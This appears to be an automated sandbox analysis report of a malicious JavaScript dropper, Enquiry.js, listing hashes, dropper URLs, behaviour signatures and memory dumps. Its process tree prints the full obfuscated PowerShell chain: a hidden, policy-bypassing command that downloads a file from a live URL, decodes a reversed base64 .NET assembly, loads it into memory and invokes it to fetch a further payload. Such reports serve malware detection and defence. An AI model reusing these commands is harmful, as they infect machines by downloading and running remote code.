Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 12:47

General

  • Target

    Enquiry.js

  • Size

    225KB

  • MD5

    90480a98c3f20658dcc43fa6db7bd562

  • SHA1

    1a379838129904188cd08ffe9c645a5daba3bea5

  • SHA256

    7c9332df56fc0061fc832475af43d1c94636a5f8710011b3952dc98716f20899

  • SHA512

    05f8c16e4ec8af3939a7fea5b8e4adde852ba00e5b0513aedaad7afeaf556741094fff75681bdbe070e3de62fc9f3c76939271c004a4bf308e38ea20126b611d

  • SSDEEP

    6144:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSq+QdBA5gC/2KZgSq+Qdt:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSm

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c

exe.dropper

https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pedantice = 'JABkAGkAcwB0AHUAcgBiAGEAcgAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA2AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAwAFIAVQBnAGIAWgAtADgARgBiAFUAcwBMAGsAbQBUAEgASwBrADcAdgBtAGkAbwBRAFIAcABIAEcARAA4AHEAVgBNAGsAZwBmAC0AdgBfAFkAbgBhAF8AVwB1ADQAVABkAHIASgBlAHAAcwBlADcAMABKAFUAZAAtAGoAOQBVAE0AZgByAHkAJgBwAGsAXwB2AGkAZAA9AGUAMAAxADAAOQA2ADMAOABjADkAYgBmAGIAOQA1ADcAMQA3ADMAMgA3ADkANAAzADcANABhADEAZgBmADYAYwAgACcAOwAkAGcAdQBpAG4AZABhAGwAZQB0AGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbAB1AGkAcgAgAD0AIAAkAGcAdQBpAG4AZABhAGwAZQB0AGEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAZABpAHMAdAB1AHIAYgBhAHIAKQA7ACQAcABzAHkAbABsAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABsAHUAaQByACkAOwAkAGEAcABlAHQAaQBiAGkAbABpAGQAYQBkAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGEAdgBpAG4AYwB1ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAGcAbwByAGQAdQBjAGgAbwAgAD0AIAAkAHAAcwB5AGwAbABvAC4ASQBuAGQAZQB4AE8AZgAoACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQApADsAJABhAHIAYQBwAGkAbgBnAGEAIAA9ACAAJABwAHMAeQBsAGwAbwAuAEkAbgBkAGUAeABPAGYAKAAkAGEAdgBpAG4AYwB1ACkAOwAkAGcAbwByAGQAdQBjAGgAbwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AZwB0ACAAJABnAG8AcgBkAHUAYwBoAG8AOwAkAGcAbwByAGQAdQBjAGgAbwAgACsAPQAgACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQAuAEwAZQBuAGcAdABoADsAJABwAGUAcgBpAHMAcwBvAGwAbwBnAGkAYQAgAD0AIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AIAAkAGcAbwByAGQAdQBjAGgAbwA7ACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlACAAPQAgACQAcABzAHkAbABsAG8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAZwBvAHIAZAB1AGMAaABvACwAIAAkAHAAZQByAGkAcwBzAG8AbABvAGcAaQBhACkAOwAkAGMAbwByAHIAaQBkAG8AIAA9ACAALQBqAG8AaQBuACAAKAAkAG0AZQB0AGgAbwBkAGkAYwBhAG0AZQBuAHQAZQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlAC4ATABlAG4AZwB0AGgAKQBdADsAJAB0AGEAbABpAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwBvAHIAcgBpAGQAbwApADsAJABvAGkAcgBhAGQAYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB0AGEAbABpAG0AKQA7ACQAcABlAGMAaABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAcABlAGMAaABhAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnAHQAeAB0AC4AOAA4ADIALwBlAGwAaQBmAC8AcgB0AC4AbQBvAGMALgBhAHkAYQBrAGkAbAByAGUAeQBhAGgAbABhAHQALwAvADoAcwBwAHQAdABoACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACAAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAMQAnACwAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACkAKQA7AA==';$torvamento = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($pedantice));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $torvamento
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$disturbar = 'https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c ';$guindaleta = New-Object System.Net.WebClient;$luir = $guindaleta.DownloadData($disturbar);$psyllo = [System.Text.Encoding]::UTF8.GetString($luir);$apetibilidade = '<<BASE64_START>>';$avincu = '<<BASE64_END>>';$gorducho = $psyllo.IndexOf($apetibilidade);$arapinga = $psyllo.IndexOf($avincu);$gorducho -ge 0 -and $arapinga -gt $gorducho;$gorducho += $apetibilidade.Length;$perissologia = $arapinga - $gorducho;$methodicamente = $psyllo.Substring($gorducho, $perissologia);$corrido = -join ($methodicamente.ToCharArray() | ForEach-Object { $_ })[-1..-($methodicamente.Length)];$talim = [System.Convert]::FromBase64String($corrido);$oirada = [System.Reflection.Assembly]::Load($talim);$pecha = [dnlib.IO.Home].GetMethod('VAI');$pecha.Invoke($null, @('txt.882/elif/rt.moc.ayakilreyahlat//:sptth', '$enfunado', '$enfunado', '$enfunado', 'MSBuild', '$enfunado', '$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','1','$enfunado'));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2620

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    9bbf99cda56d8e4155c84f7db0c3308d

    SHA1

    d369faac82059b2b0bda0577cf742c3e0c599a3c

    SHA256

    002a83b42a9e52e7e8e51ab0fd28b675ca23aa837d0b52ba6d4683e783404643

    SHA512

    048e4b9273d94bf3c21bf77e923ba7d16a37a7aebca1957fb295404dd432df628121ef88a8fb3a95e2ca32308417d7af13a4904e0d70ce27462c163f43f18102

  • memory/2804-4-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

    Filesize

    4KB

  • memory/2804-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2804-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

  • memory/2804-7-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-13-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB

  • memory/2804-14-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

    Filesize

    9.6MB